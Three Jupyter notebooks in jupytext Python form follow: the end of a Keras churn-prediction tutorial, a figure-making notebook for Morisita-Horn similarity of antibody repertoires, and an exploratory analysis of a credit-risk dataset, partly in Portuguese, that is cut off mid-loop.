with 7 and check the accuracy ann.add(tf.keras.layers.Dense(units=6, activation='relu')) # + [markdown] id="BELWAc_8YJze" # ### Adding the second hidden layer # + id="uWv4SWiNaky8" executionInfo={"status": "ok", "timestamp": 1602181070158, "user_tz": 300, "elapsed": 483, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} ann.add(tf.keras.layers.Dense(units=6, activation='relu')) # + [markdown] id="OyNEe6RXYcU4" # ### Adding the output layer # + id="KgEqrPMeaoAd" executionInfo={"status": "ok", "timestamp": 1602181072283, "user_tz": 300, "elapsed": 777, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} ann.add(tf.keras.layers.Dense(units=1, activation='sigmoid')) # for non-binary classification, the activation function should be 'softmax' # + [markdown] id="JT4u2S1_Y4WG" # ## Part 3 - Training the ANN # + [markdown] id="8GWlJChhY_ZI" # ### Compiling the ANN # + id="OdWOpbOybyNN" executionInfo={"status": "ok", "timestamp": 1602181638725, "user_tz": 300, "elapsed": 879, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} ann.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # for non-binary classification the loss function should be 'category_corossentropy' # + [markdown] id="0QR_G5u7ZLSM" # ### Training the ANN on the Training set # + id="uDdcAuXUdf7b" executionInfo={"status": "ok", "timestamp": 1602181812182, "user_tz": 300, "elapsed": 29837, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="69f987c6-f036-4601-bf9f-713bb8582c12" colab={"base_uri": "https://localhost:8080/", "height": 1000} ann.fit(x=X_train, y=y_train, batch_size=32, epochs=100) # batch_size = 32 is the default parameter - it is an important hyperparameter # epoch is another important hyperparameter that should not be a small number # because ann needs a certain amount of epochs to learn properly # + [markdown] id="tJj5k2MxZga3" # ## Part 4 - Making the predictions and evaluating the model # + id="ntmgfDNye15M" executionInfo={"status": "ok", "timestamp": 1602182267937, "user_tz": 300, "elapsed": 514, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="8ed3eedf-1506-4f3d-f661-5d26fa0e3728" colab={"base_uri": "https://localhost:8080/", "height": 35} customer = [[1, 0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]] customer = sc.transform(customer) print(ann.predict(customer)) # + [markdown] id="84QFoqGYeXHL" # ### Predicting the result of a single observation # + [markdown] id="CGRo3eacgDdC" # **Homework** # # Use our ANN model to predict if the customer with the following informations will leave the bank: # # Geography: France # # Credit Score: 600 # # Gender: Male # # Age: 40 years old # # Tenure: 3 years # # Balance: \$ 60000 # # Number of Products: 2 # # Does this customer have a credit card ? Yes # # Is this customer an Active Member: Yes # # Estimated Salary: \$ 50000 # # So, should we say goodbye to that customer ? # + [markdown] id="ZhU1LTgPg-kH" # **Solution** # + [markdown] id="wGjx94g2n7OV" # Therefore, our ANN model predicts that this customer stays in the bank! # # **Important note 1:** Notice that the values of the features were all input in a double pair of square brackets. That's because the "predict" method always expects a 2D array as the format of its inputs. And putting our values into a double pair of square brackets makes the input exactly a 2D array. # # **Important note 2:** Notice also that the "France" country was not input as a string in the last column but as "1, 0, 0" in the first three columns. That's because of course the predict method expects the one-hot-encoded values of the state, and as we see in the first row of the matrix of features X, "France" was encoded as "1, 0, 0". And be careful to include these values in the first three columns, because the dummy variables are always created in the first columns. # + [markdown] id="u7yx47jPZt11" # ### Predicting the Test set results # + id="Hfyfn8bchH9A" executionInfo={"status": "ok", "timestamp": 1602182664993, "user_tz": 300, "elapsed": 466, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="425e112f-cab6-468a-ea6a-94d9b5579997" colab={"base_uri": "https://localhost:8080/", "height": 146} y_pred = ann.predict(X_test) y_pred = (y_pred > 0.5) print(np.concatenate((y_pred.reshape(len(y_pred), 1), y_test.reshape(len(y_test), 1)), 1)) # + [markdown] id="o0oyfLWoaEGw" # ### Making the Confusion Matrix # + id="dq3VYJxEh7Cr" executionInfo={"status": "ok", "timestamp": 1602182747745, "user_tz": 300, "elapsed": 446, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "09152436479381660151"}} outputId="01a48985-1994-419f-a7d2-8a5f5daa667b" colab={"base_uri": "https://localhost:8080/", "height": 72} from sklearn.metrics import confusion_matrix, accuracy_score cm = confusion_matrix(y_test, y_pred) print(cm) accuracy_score(y_test, y_pred) # + id="WuOez4ZSiQj7"
artificial_neural_networks/artificial_neural_network.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Plotting Morisita-Horn similarity # # In our manuscript, we use Morisita-Horn similarity to compare repertoires across subjects. Details of how we calculated MH similarity, as well as code and data, can be found [**here**](LINK). In this notebook, we're going to make the following three figure panels: # # * Line plot of intra- and inter-subject MH similarity (**Figure 1d** and **Extended Data Figure 3**) # * Clustermap of pairwise MH similarities (**Figure 1g**) # * Bar/scatter plot of MH similarity by isotype class (**Figure 1h**) # # The following Python packages are required to run the code in this notebook: # * numpy # * pandas # * scipy # * matplotlib # * seaborn # * [abutils](https://www.github.com/briney/abutils) # # They can be install by running `pip install numpy pandas scipy matplotlib seaborn abutils` # + from __future__ import print_function import os import re import sys import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt import matplotlib as mpl from scipy import stats from abutils.utils.color import truncate_colormap, hex_to_rgb from abutils.utils.pipeline import list_files import warnings warnings.filterwarnings('ignore') # %matplotlib inline # - # ### Comparison class # # This class makes it easier to read, manage and process the MH similarity data for a single pairwise comparison. Input is a string containing the similarity information for a single comparison (read directly from the MH similarity output file, which can be generated with [**this code**](LINK)) class Comparison(object): """docstring for Comparison""" def __init__(self, raw_data): super(Comparison, self).__init__() self.raw_data = raw_data self.raw_lines = [l.strip() for l in self.raw_data.split('\n')] self._subjects = None self._comparison_type = None self._sizes = None self._scores = None self._means = None self._color = None self._primary = None @property def subjects(self): if self._subjects is None: self._subjects = sorted(list(set(self.raw_lines[0].split()))) return self._subjects @property def primary(self): return self._primary @primary.setter def primary(self, primary): self._primary = primary @property def secondary(self): if self._primary is not None: sec = [s for s in self.subjects if s != self.primary] if len(sec) == 0: return None else: return sec[0] else: return None @property def comparison_type(self): if self._comparison_type is None: if len(self.subjects) == 1: self._comparison_type = 'intra' else: self._comparison_type = 'inter' return self._comparison_type @property def scores(self): if self._scores is None: scores = {} for line in self.raw_lines[1:]: if line.strip(): split_line = line.strip().split() size, _scores = int(split_line[0]), [float(s) for s in split_line[1:]] scores[size] = _scores self._scores = scores return self._scores @property def sizes(self): if self._sizes is None: self._sizes = sorted(self.scores.keys()) return self._sizes @property def means(self): if self._means is None: means = {} for size, scores in self.scores.items(): means[size] = np.mean(scores) self._means = means return self._means @property def color(self): return self._color @color.setter def color(self, color): self._color = color def mean(self, size): return self.means.get(size, None) def ci(self, size, percentile=95): scores = self.scores.get(size, None) if scores is None: return None mean = np.mean(scores) std = np.std(scores) lower_ci, upper_ci = stats.norm.interval(percentile / 100., loc=mean, scale=std) return (lower_ci, upper_ci) def plot_data(self, percentile=95, upper_limit=None, lower_limit=None): sizes = self.sizes if lower_limit is not None: sizes = [s for s in sizes if s >= lower_limit] if upper_limit is not None: sizes = [s for s in sizes if s <= upper_limit] means = [] lower_cis = [] upper_cis = [] for s in sizes: means.append(self.mean(s)) lci, uci = self.ci(s, percentile=percentile) lower_cis.append(lci) upper_cis.append(uci) return sizes, means, lower_cis, upper_cis # ### Read the similarity datafile and make Comparison objects # # The header for each pairwise comparison in the datafile starts with a `'#'`, so if we read the entire datafile and split by the `'#'` character, we get a list of strings each containing the similarity data for a single pairwise comparison. # # If you've generated your own MH similarity data using the above data processing code, by default it will be saved to `'../01_data_processing/data/user-calculated_mh_similarity/mh-similarities_combined.txt'`. Replacing the path to the default datafile with this path will create plots based on your data rather than the data in the paper. with open('../01_data_processing/data/mh_similarity/mh-similarities_combined.txt') as f: data = f.read() comps = [Comparison(d) for d in data.split('#') if d.strip()] # ### Subjects and colors # # The list of subject colors is maintained throughout all of the figures in the manuscript. It's similar to the standard HLS palette created by Seaborn, but with the 4th and 5th colors modified slightly to make them more distinguishable. # + subjects = sorted(list(set([subject for comp in comps for subject in comp.subjects]))) color_list = sns.hls_palette(10, s=0.9) color_list[3] = sns.hls_palette(11, s=0.9)[3] color_list[4] = sns.hls_palette(12, s=0.9)[5] sns.palplot(color_list) plt.show() color_dict = {s: c for s, c in zip(subjects, color_list)} # - # ## Line plots of MH similarity # + def similarity_plot(comparisons, colors=None, figfile=None, fill_between_alpha=0.2, line_alpha=0.85, legend_location='lower right'): # set color values if colors is None: if all([c.color is not None for c in comparisons]): colors = [c.color for c in comparisons] else: colors = sns.hls_palette(s=0.8, n_colors=len(comparisons)) sns.set_style('white') fig = plt.figure(figsize=(6, 6)) plt.xscale('log') # plot the CI shading first for i, comp in enumerate(comparisons): sizes, means, lower_cis, upper_cis = comp.plot_data() plt.fill_between(sizes, lower_cis, upper_cis, color=colors[i], alpha=fill_between_alpha) # iterate through the subjects again and plot the mean lines # so that they're on top of all of the CI shading for i, comp in enumerate(comparisons): sizes, means, lower_cis, upper_cis = comp.plot_data() label = comp.subjects if comp.comparison_type == 'intra' else [comp.primary, comp.secondary] plt.plot(sizes, means, linewidth=2, c=colors[i], alpha=line_alpha, label=' vs '.join(label)) # plot the horizontal reference lines for y in np.arange(0., 1.01, 0.2): ls = ':' lw = 1 alpha=0.5 plt.axhline(y=y, xmin=0, xmax=10, linewidth=lw, color='k', linestyle=ls, alpha=alpha) # plot configuration ax = plt.gca() ax.set_ylim(0, 1.01) # axis labels ax.set_ylabel('Morisita-Horn similarity', fontsize=14) ax.set_xlabel('Sequence count', fontsize=14) # change the fontsize of the tick labels ax.tick_params(axis='x', labelsize=12, length=6, width=1.25, pad=8, top=False) ax.tick_params(axis='x', which='minor', labelsize=0, length=4, width=1, top=False) ax.tick_params(axis='y', which='major', labelsize=12, length=0, pad=6, right=False) # hide top, left and right spines ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.spines['left'].set_visible(False) # configure the legend handles, labels = ax.get_legend_handles_labels() legend = ax.legend(handles, labels, loc=legend_location, fontsize=12, frameon=True, borderpad=0.5, labelspacing=0.4) legend.get_frame().set_facecolor('w') legend.get_frame().set_edgecolor('w') # save or show the image if figfile is None: plt.show() else: plt.tight_layout() plt.savefig(figfile) def plot_single_comparison_set(subject, figfile=None, legend_location='lower right'): # retrieve and sort the comparison data _comps = [c for c in comps if subject in c.subjects] for c in _comps: c.primary = subject intra = [c for c in _comps if c.comparison_type == 'intra'] inter = sorted([c for c in _comps if c.comparison_type == 'inter'], key=lambda x: x.secondary) _comps = intra + inter # retrieve and order the color values colors = [color_dict[subject]] + [color_dict[c.secondary] for c in inter] # make the similarity plot similarity_plot(_comps, colors=colors, legend_location=legend_location, figfile=figfile) # - # ### Make the MH similarity line plots # # By default, the plots will be shown inline but not saved. To save the figure files (in PDF format), uncomment the `figfile=...` line below. To change the format in which the file is saved (JPG, TIFF, etc), simply change the extension of the figfile name (replace `.pdf` with `.jpg`, for example). for subject in subjects: print(subject) plot_single_comparison_set(subject, # figfile='./figures/MH similarity/{}_vj-cdr3len_similarity.pdf'.format(subject) ) # ## Clustermap of cross-subject similarity # # Transform comparison data into a DataFrame, using the 1,000,000 sequence sample size as the comparison measure # + comp_dict = {} for comp in comps: subjects = comp.subjects if len(subjects) == 1: subjects = subjects * 2 s1, s2 = subjects if s1 not in comp_dict: comp_dict[s1] = {} if s2 not in comp_dict: comp_dict[s2] = {} score = comp.means[1000000] comp_dict[s1][s2] = score comp_dict[s2][s1] = score comp_df = pd.DataFrame(comp_dict) # - # To save the clustermap figure (instead of showing inline but not saving, which is the default behavior), comment out the `plt.show()` line and uncomment the last two lines in the code block. If you'd like to save the figure in a format other than PDF, replace the extension of the filename to your desired format (`.jpg` or `.png`, for example). # # Note that we tweaked this figure slightly in Illustrator to make it a little more visually appealing. The following edits were made: # * Removed the top dendrogram (currently, Seaborn doesn't support clustering along an axis without also showing the dendrogram in the plot) # * Increased the line weight of the left dendrogram # * Moved the x-axis labels to the top of the clustermap # * Removed the colorbar # + plt.figure(figsize=[7, 4]) cm = sns.clustermap(comp_df, cmap=truncate_colormap('Greys', minval=0.15, maxval=0.9), linewidth=4, row_colors=color_list, col_colors=color_list) ax = cm.ax_heatmap ax.set_yticklabels(ax.get_yticklabels(), rotation=0, fontsize=20) ax.set_xticklabels(ax.get_xticklabels(), rotation=60, fontsize=20) plt.show() # plt.tight_layout() # cm.savefig('./figures/similarity_clustermap.pdf') # - # ## Box/scatter plot of MH similarity by isotype # # To get a better idea of the relative contributions of memory (antigen experienced) and naive (antigen inexperienced) repertoires on overall repertoire similarity, we grouped sequences into "isotype classes" and computed MH similarity on each of the classes. The isotype classes are: # # * **IgM, with less than two mutations:** these sequences are not class-switched and are minimally mutated, meaning they should be enriched in sequences from naive B cells # * **IgM, with two or more mutations:** these sequences are not class-switched but have evidence of somatic mutation, suggesting enrichment of sequences from IgM memory B cells. # * **IgG:** these sequences are class-switched, indicating they come exclusively from IgG memory B cells. # # First, we load all of the datasets: # + # all sequences with open('../01_data_processing/data/mh_similarity/mh-similarities_combined.txt') as f: data = f.read() all_comps = [Comparison(d) for d in data.split('#') if d.strip()] # IgM with less than 2 mutations with open('../01_data_processing/data/mh_similarity/mh-similarities_combined_IgM-lte1-ntmuts.txt') as f: data = f.read() igmlte1_comps = [Comparison(d) for d in data.split('#') if d.strip()] # IgM with 2 or more mutations with open('../01_data_processing/data/mh_similarity/mh-similarities_combined_IgM-gt1-ntmuts.txt') as f: data = f.read() igmgt1_comps = [Comparison(d) for d in data.split('#') if d.strip()] # IgG with open('../01_data_processing/data/mh_similarity/mh-similarities_combined_IgG.txt') as f: data = f.read() igg_comps = [Comparison(d) for d in data.split('#') if d.strip()] # - # ### Combine all of the isotype data into a single DataFrame # + data = [] for i, comp in enumerate(all_comps): d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000], 'isotype': 'All', 'Comparison type': comp.comparison_type} data.append(d) for i, comp in enumerate(igmlte1_comps): d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000], 'isotype': 'IgM (<2 mutations)', 'Comparison type': comp.comparison_type} data.append(d) for i, comp in enumerate(igmgt1_comps): d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000], 'isotype': 'IgM (2+ mutations)', 'Comparison type': comp.comparison_type} data.append(d) for i, comp in enumerate(igg_comps): d = {'num': i, 'Morisita-Horn similarity': comp.means[1000000], 'isotype': 'IgG', 'Comparison type': comp.comparison_type} data.append(d) df = pd.DataFrame(data) # - # ### Make the box/scatter plot # # By default, the figure will be shown inline and not saved. To save the plot, comment out the `plt.show()` line and uncomment the last two lines of the code block. # + sns.set_style('white') plt.figure(figsize=(5, 4.5)) # make the boxplot box = sns.boxplot(data=df, x='Comparison type', y='Morisita-Horn similarity', hue='isotype', fliersize=0, saturation=1., palette=['0.5', '0.65', '0.8', '0.9'], hue_order=['All', 'IgM (<2 mutations)', 'IgM (2+ mutations)', 'IgG'], linewidth=2) # overlay the scatterplot sns.stripplot(data=df, x='Comparison type', y='Morisita-Horn similarity', hue='isotype', palette=['0.25', '0.25', '0.25', '0.25'], hue_order=['All', 'IgM (<2 mutations)', 'IgM (2+ mutations)', 'IgG'], jitter=True, dodge=True, alpha=0.4) # draw the horizontal reference lines for y in np.arange(0.5, 1.01, 0.1): ls = ':' lw = 1 alpha=0.5 plt.axhline(y=y, xmin=0, xmax=10, linewidth=lw, color='k', linestyle=ls, alpha=alpha) # style the plot ax = plt.gca() #axis limits and labels ax.set_ylim([0.4, 1.05]) ax.set_ylabel('Morisita-Horn similarity', fontsize=14) ax.set_xlabel('Comparison type', fontsize=14) # axis tick appearance ax.tick_params(axis='x', labelsize=12, direction='out', width=1.5, length=6, pad=8, top=False) ax.tick_params(axis='y', which='major', labelsize=12, length=6, width=1.25, pad=4, right=False, left=False) # remove top, left and right spines ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.spines['left'].set_visible(False) # configure the legend handles, labels = ax.get_legend_handles_labels() legend = ax.legend(handles[:4], labels[:4], loc='lower left', fontsize=11, frameon=True) legend.get_frame().set_facecolor('w') legend.get_frame().set_edgecolor('w') plt.show() # plt.tight_layout() # plt.savefig('./figures/similarity-boxplot_by-isotype.pdf') # -
make_figures/02_morisita-horn_similarity.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # + import pickle import requests import pandas_profiling import multiprocessing import json import numpy as np import pandas as pd import seaborn as sns from IPython.core.display import HTML from IPython.display import Image from tabulate import tabulate from sklearn.preprocessing import LabelEncoder from sklearn.model_selection import train_test_split from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, classification_report,confusion_matrix from scipy import stats as ss from sklearn.preprocessing import RobustScaler, MinMaxScaler from pandas_profiling import ProfileReport import matplotlib.pyplot as plt import plotly.express as px # - # # 0.0 Imports # ## 0.1 Helper Functions # + def jupyter_settings(): # %matplotlib inline # %pylab inline plt.style.use( 'bmh' ) plt.rcParams['figure.figsize'] = [18, 10] plt.rcParams['font.size'] = 24 display( HTML( '<style>.container { width:100% !important; }</style>') ) pd.options.display.max_columns = None pd.options.display.max_rows = None pd.set_option( 'display.expand_frame_repr', False ) sns.set() def cramer_v (x,y): cm = pd.crosstab(x, y).values n = cm.sum() r,k = cm.shape chi2 = ss.chi2_contingency( cm )[0] chi2corr = max(0, chi2 - (k-1)*(r-1)/(n-1)) kcorr = k - (k -1)**2/(n-1) rcorr = r - (r -1)**2/(n-1) return np.sqrt((chi2corr/n)/(min(kcorr-1, rcorr-1))) # - jupyter_settings() # ## 0.2 Loanding Data df_credit = pd.read_csv("credit_risk_dataset.csv", index_col = False, low_memory = False) df_credit.sample(5) # # 1.0 Data Descriptive df1 = df_credit.copy() # # 1.1 Data Dimensions print ('Number of Rows: {}'.format( df1.shape[0])) print ('Number of Cols: {}'.format (df1.shape[1])) # # 1.2 Data Types print(df1.dtypes) # # 1.3 Check NA df1.duplicated().sum() df1 = df1.drop_duplicates() df1.isnull().sum() # # 1.4 Fillout NA df_media_int = df1[['loan_int_rate', 'loan_grade']].groupby ('loan_grade').agg('mean').reset_index() df_media_int # + ## person_emp_length # Hipótese para Valor Ausente: Pessoa Desempregada Atualmente df1['person_emp_length'].fillna(0, inplace = True) ## loan_int_rate # Hipótese para Valor Ausente: Coleta de Dados Incompleta grande_int_mean = {'A': 7.328423, 'B': 10.995756, 'C': 13.464579, 'D': 15.360698 , 'E': 17.008409, 'F': 18.609159, 'G': 20.251525} df1['loan_int_rate'] = df1['loan_int_rate'].fillna(df1['loan_grade'].map(grande_int_mean)) # - df1.head() df_dashboard = df1.to_csv('df_dashboard.csv', index = False) # # 1.5 Descriptive Statistical num_attributes = df1.select_dtypes( include = ['int64', 'float64']) cat_attributes = df1.select_dtypes( exclude = ['int64', 'float64']) # # 1.5.1 Numerical Attributes # + # Central Tendency - Mean, Median ct1 = pd.DataFrame (num_attributes.apply (np.mean)).T ct2 = pd.DataFrame (num_attributes.apply (np.median)).T #Dispersion - std, min, max, range, skew, kurtosis d1 = pd.DataFrame (num_attributes.apply (np.std)).T d2 = pd.DataFrame (num_attributes.apply (min)).T d3 = pd.DataFrame (num_attributes.apply (max)).T d4 = pd.DataFrame (num_attributes.apply (lambda x: x.max() - x.min())).T d5 = pd.DataFrame (num_attributes.apply (lambda x: x.skew())).T d6 = pd.DataFrame (num_attributes.apply (lambda x: x.kurtosis())).T # Concatenate t = pd.concat ((d2, d3, d4, ct1, ct2, d1, d5, d6)).T.reset_index() t.columns =['attributes', 'min', 'max', 'range', 'mean', 'median', 'std', 'skew', 'kurtosis'] t # - df1 = df1.drop(df1[df1['person_age'] > 100].index) df1 = df1.drop(df1[df1['person_emp_length'] > 50].index).reset_index() df1.dtypes # # 1.5.1 Categorical Attributes cat_attributes.apply(lambda x: x.unique().shape[0]) categories = ['OWN', 'MORTGAGE', 'RENT', 'OTHER'] df1['person_home_ownership'] = pd.Categorical(df1['person_home_ownership'], categories) median_value = np.median(df1['person_home_ownership'].cat.codes) median_text = categories[int(median_value)] print(median_value, median_text) df1['person_home_ownership'].value_counts(normalize = True)*100 categories = ['EDUCATION', 'MEDICAL', 'VENTURE', 'PERSONAL', 'HOMEIMPROVEMENT', 'DEBTCONSOLIDATION'] df1['loan_intent'] = pd.Categorical(df1['loan_intent'], categories) median_value = np.median(df1['loan_intent'].cat.codes) median_text = categories[int(median_value)] print(median_value, median_text) df1['loan_intent'].value_counts(normalize = True)*100 categories = ['A', 'B', 'C', 'D', 'E', 'F', 'G'] df1['loan_grade'] = pd.Categorical(df1['loan_grade'], categories) median_value = np.median(df1['loan_grade'].cat.codes) median_text = categories[int(median_value)] print(median_value, median_text) df1['loan_grade'].value_counts(normalize = True)*100 categories = ['N', 'Y'] df1['cb_person_default_on_file'] = pd.Categorical(df1['cb_person_default_on_file'], categories) median_value = np.median(df1['cb_person_default_on_file'].cat.codes) median_text = categories[int(median_value)] print(median_value, median_text) df1['cb_person_default_on_file'].value_counts(normalize = True)*100 # # 2.0 Feature Engineering df2 = df1.copy() # # 2.1 Mapa Mental de Hipóteses Image ('img/Credit_Risk_Dataset.png') # # 2.2 Criação das Hipóteses # **1.** Clientes com idades menores tendem a fazer mais os empréstimos # # **2.** Clientes com mais de sete anos de bom histórico crediário tendem a pagar mais os empréstimos # # **3.** Clientes com Imóvel Próprio tendem a pagar mais os empréstimos # # **4.** Clientes que tem como finalidade para o empréstimo reformas residênciais são maioria # # **5.** Empréstimos mais arriscados tendem a possuir Taxa de Juros mais altas # # **6.** Clientes com menos de dez anos empregados tendem a pagar menos os empréstimos # # **7.** Clientes com renda superior a 20000 tendem a pagar mais os empréstimos # # **8.** Clientes com maior grau de empréstimo tendem a pagar menos os empréstimos # # 3.0 Análise Exploratória de Dados df3 = df2.copy() # + def test_profile(): proof = pandas_profiling.ProfileReport(df3) proof.to_file("credit_out.html") if __name__ == '__main__': multiprocessing.freeze_support() test_profile() # - # # 3.1 Análise Univariada # ## 3.1.1 Response Variable plt.rcParams['figure.figsize'] = [16, 8] df3['loan_status'].value_counts().plot.barh(title="Proportion of Status") # ## 3.1.2 Numerical Variable num_attributes.hist(bins = 25); # ## 3.1.3 Categorical Variable cat_attributes.head() # + #person_home_ownership plt.subplot (2,1,1) sns.countplot(x = 'person_home_ownership', data = df3) #loan_intent plt.subplot (2,1,2) sns.countplot(x = 'loan_intent', data = df3) # + #loan_grade plt.subplot (2,1,1) sns.countplot(x = 'loan_grade', data = df3) #cb_person_default_on_file plt.subplot (2,1,2) sns.countplot(x = 'cb_person_default_on_file', data = df3) # - # # 3.2 Análise Bivariada # **H1.** Clientes com idades menores tendem a fazer mais empréstimos # + n_obs = df3.shape[0] bins = list(np.arange( 20, 50, 10)) df3['age_binned'] = pd.cut (df3['person_age'], bins = bins) counts = (df3[['age_binned','loan_status']] .groupby(['age_binned','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # + bins1 = list(np.arange( 50, 100, 10)) df3['age_binned1'] = pd.cut (df3['person_age'], bins = bins1) counts1 = (df3[['age_binned1','loan_status']] .groupby(['age_binned1','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts1.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # - age = pd.concat([counts, counts1], axis=0) age['0 em %'] = age[0]/(age[0] + age[1])*100 age['1 em %'] = age[1]/(age[0] + age[1])*100 age # **H2.** Clientes com mais de sete anos de bom histórico crediário tendem a pagar mais os empréstimos # + n_obs = df3.shape[0] bins2 = list(np.arange( 2, 16, 1)) df3['hist_binned'] = pd.cut (df3['cb_person_cred_hist_length'], bins = bins2) counts2 = (df3[['hist_binned','loan_status']] .groupby(['hist_binned','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts2.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # + bins3 = list(np.arange( 16, 31, 1)) df3['hist_binned1'] = pd.cut (df3['person_age'], bins = bins3) counts3 = (df3[['hist_binned1','loan_status']] .groupby(['hist_binned1','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts3.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # - hist_length = pd.concat([counts2, counts3], axis=0) hist_length['0 em %'] = hist_length[0]/(hist_length[0] + hist_length[1])*100 hist_length['1 em %'] = hist_length[1]/(hist_length[0] + hist_length[1])*100 hist_length # **3.** Clientes com Imóvel Próprio tendem a pagar mais os empréstimos # + n_obs = df3.shape[0] counts4 = (df3[['person_home_ownership','loan_status']] .groupby(['person_home_ownership','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts4.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status') # - counts4['0 em %'] = counts4[0]/(counts4[0] + counts4[1])*100 counts4['1 em %'] = counts4[1]/(counts4[0] + counts4[1])*100 counts4 # **4.** Clientes que tem como finalidade para o empréstimo reformas residenciais são maioria # + n_obs = df3.shape[0] counts5 = (df3[['loan_intent','loan_status']] .groupby(['loan_intent','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts5.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status') # - counts5['0 em %'] = counts5[0]/(counts5[0] + counts5[1])*100 counts5['1 em %'] = counts5[1]/(counts5[0] + counts5[1])*100 counts5['Quantidade Total em %'] = (counts5[0] + counts5[1])*100 counts5 # **5.** Cliente que obtiveram Empréstimos com taxas Taxa de Juros mais altas tendem a pagar menos os Empréstimos # + n_obs = df3.shape[0] bins4 = [5,10,15,20,25] df3['rate_binned'] = pd.cut (df3['loan_int_rate'], bins = bins4) counts6 = (df3[['rate_binned','loan_status']] .groupby(['rate_binned','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts6.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # - counts6['0 em %'] = counts6[0]/(counts6[0] + counts6[1])*100 counts6['1 em %'] = counts6[1]/(counts6[0] + counts6[1])*100 counts6['Quantidade Total em %'] = (counts6[0] + counts6[1])*100 counts6 # **6.** Clientes com menos de dez anos empregados tendem a pagar menos os empréstimos # + bins5 = list(np.arange( 0, 20, 5)) df3['emp_length_binned'] = pd.cut (df3['person_emp_length'], bins = bins5) counts7 = (df3[['emp_length_binned','loan_status']] .groupby(['emp_length_binned','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts7.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # + bins6 = list(np.arange( 20, 45, 5)) df3['emp_length_binned1'] = pd.cut (df3['person_emp_length'], bins = bins6) counts8 = (df3[['emp_length_binned1','loan_status']] .groupby(['emp_length_binned1','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts8.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # + emp_length = pd.concat([counts7, counts8], axis=0) emp_length['0 em %'] = emp_length[0]/(emp_length[0] + emp_length[1])*100 emp_length['1 em %'] = emp_length[1]/(emp_length[0] + emp_length[1])*100 emp_length['Quantidade Total em %'] = (emp_length[0] + emp_length[1])*100 emp_length # - # **7.** Clientes com renda superior a 20000 tendem a pagar mais os empréstimos # + bins7 = list(np.arange( 4000, 34000, 4000)) df3['person_income_binned'] = pd.cut (df3['person_income'], bins = bins7) counts9 = (df3[['person_income_binned','loan_status']] .groupby(['person_income_binned','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts9.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status' ) # - counts9['0 em %'] = counts9[0]/(counts9[0] + counts9[1])*100 counts9['1 em %'] = counts9[1]/(counts9[0] + counts9[1])*100 counts9 # **8.** Clientes com maior grau de empréstimo tendem a pagar menos os empréstimos # + n_obs = df3.shape[0] counts10 = (df3[['loan_grade','loan_status']] .groupby(['loan_grade','loan_status']) .size() .div(n_obs) .unstack('loan_status') ) ax = counts10.plot.bar() ax.legend( loc='center right', bbox_to_anchor=(1.2, 0.5), title='loan_status') # - counts10['0 em %'] = counts10[0]/(counts10[0] + counts10[1])*100 counts10['1 em %'] = counts10[1]/(counts10[0] + counts10[1])*100 counts10['Quantidade Total em %'] = (counts10[0] + counts10[1])*100 counts10 tab =[['Hipóteses', 'Conclusão', 'Relevância'], ['H1', 'Verdadeira', 'Alta'], ['H2', 'Há Excessões', 'Media'], ['H3', 'Verdadeira', 'Media'], ['H4', 'Falsa', 'Media'], ['H5', 'Verdadeira', 'Alta'], ['H6', 'Há Excessões', 'Media'], ['H7', 'Verdadeira', 'Alta'], ['H8', 'Verdadeira', 'Alta'] ] print( tabulate( tab ) ) # # 3.3 Análise Multivarida # #### 3.3.1 Numerical Variable # + corr = num_attributes.corr( method = 'pearson') mask = np.zeros_like(corr) mask[np.triu_indices_from(mask)] = True with sns.axes_style("white"): ax = sns.heatmap(corr, mask=mask, square=True, annot = True) # - # #### 3.3.2 Categorical Variable df3.head() # + #list of attributes for Cramer's V correlation cat_attributes_list = cat_attributes.columns.tolist() corr_dict = {} for i in range (len (cat_attributes_list)): corr_list = [] 